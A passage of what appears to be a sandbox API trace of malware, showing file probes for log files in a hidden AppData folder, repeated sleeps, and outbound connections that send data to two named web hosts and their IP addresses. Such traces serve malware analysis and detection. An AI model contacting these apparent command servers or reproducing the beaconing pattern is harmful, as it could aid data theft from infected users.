DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.986] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0206.986] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.986] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.986] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0206.986] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0206.986] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0206.986] Sleep (dwMilliseconds=0x7d0) [0207.000] Sleep (dwMilliseconds=0x7d0) [0207.019] Sleep (dwMilliseconds=0x7d0) [0207.031] Sleep (dwMilliseconds=0x7d0) [0207.047] Sleep (dwMilliseconds=0x7d0) [0207.062] Sleep (dwMilliseconds=0x7d0) [0207.078] Sleep (dwMilliseconds=0x7d0) [0207.097] Sleep (dwMilliseconds=0x7d0) [0207.109] Sleep (dwMilliseconds=0x7d0) [0207.124] Sleep (dwMilliseconds=0x7d0) [0207.140] socket (af=2, type=1, protocol=6) returned 0x614 [0207.141] getaddrinfo (in: pNodeName="www.brasseriedufayard.com", pServiceName="80", pHints=0x6f0d4b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0d4e8 | out: ppResult=0x6f0d4e8*=0x3eb31d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x70ac870*(sa_family=2, sin_port=0x50, sin_addr="145.239.37.162"), ai_next=0x0)) returned 0 [0207.171] connect (s=0x614, name=0x70ac870*(sa_family=2, sin_port=0x50, sin_addr="145.239.37.162"), namelen=16) returned 0 [0207.492] send (s=0x614, buf=0x25a505a*, len=177, flags=0) returned 177 [0207.493] setsockopt (s=0x614, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0207.493] recv (in: s=0x614, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 451 [0207.540] closesocket (s=0x614) returned 0 [0207.541] Sleep (dwMilliseconds=0x7d0) [0207.546] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.546] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.546] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0207.546] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0207.546] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.546] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.546] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0207.546] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0207.546] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.546] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.546] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0207.546] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0207.546] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.546] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.547] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0207.547] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0207.547] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.547] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.547] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0207.547] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0207.547] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.547] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.547] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0207.547] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0207.547] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.547] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.547] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0207.547] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0207.547] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.547] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.547] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0207.547] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0207.547] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.548] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.548] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0207.548] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0207.548] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.548] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.548] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0207.548] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0207.548] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.548] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.548] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0207.548] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0207.548] Sleep (dwMilliseconds=0x7d0) [0207.567] Sleep (dwMilliseconds=0x7d0) [0207.577] Sleep (dwMilliseconds=0x7d0) [0207.594] Sleep (dwMilliseconds=0x7d0) [0207.608] Sleep (dwMilliseconds=0x7d0) [0207.629] Sleep (dwMilliseconds=0x7d0) [0207.640] Sleep (dwMilliseconds=0x7d0) [0207.655] Sleep (dwMilliseconds=0x7d0) [0207.671] Sleep (dwMilliseconds=0x7d0) [0207.693] Sleep (dwMilliseconds=0x7d0) [0207.702] Sleep (dwMilliseconds=0x7d0) [0207.733] Sleep (dwMilliseconds=0x7d0) [0207.749] Sleep (dwMilliseconds=0x7d0) [0207.770] Sleep (dwMilliseconds=0x7d0) [0207.780] Sleep (dwMilliseconds=0x7d0) [0207.797] Sleep (dwMilliseconds=0x7d0) [0207.812] Sleep (dwMilliseconds=0x7d0) [0207.831] Sleep (dwMilliseconds=0x7d0) [0207.842] Sleep (dwMilliseconds=0x7d0) [0207.858] Sleep (dwMilliseconds=0x7d0) [0207.873] Sleep (dwMilliseconds=0x7d0) [0207.893] Sleep (dwMilliseconds=0x7d0) [0207.906] Sleep (dwMilliseconds=0x7d0) [0207.920] Sleep (dwMilliseconds=0x7d0) [0207.936] socket (af=2, type=1, protocol=6) returned 0x614 [0207.936] getaddrinfo (in: pNodeName="www.dtjug.com", pServiceName="80", pHints=0x6f0d858*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0d888 | out: ppResult=0x6f0d888*=0x3eb44d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x70ace70*(sa_family=2, sin_port=0x50, sin_addr="47.75.18.54"), ai_next=0x0)) returned 0 [0209.082] connect (s=0x614, name=0x70ace70*(sa_family=2, sin_port=0x50, sin_addr="47.75.18.54"), namelen=16) returned 0 [0209.441] send (s=0x614, buf=0x25a505a*, len=165, flags=0) returned 165 [0209.442] setsockopt (s=0x614, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0209.442] recv (in: s=0x614, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 1340 [0209.805] closesocket (s=0x614) returned 0 [0209.813] Sleep (dwMilliseconds=0x7d0) [0209.829] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.829] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.830] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0209.830] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.831] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.831] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.831] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.831] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.831] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.831] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.831] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.831] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.831] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.831] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.831] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.831] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.831] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.831] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.831] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.831] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0209.831] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.831] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.831] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0209.832] RtlFreeHeap 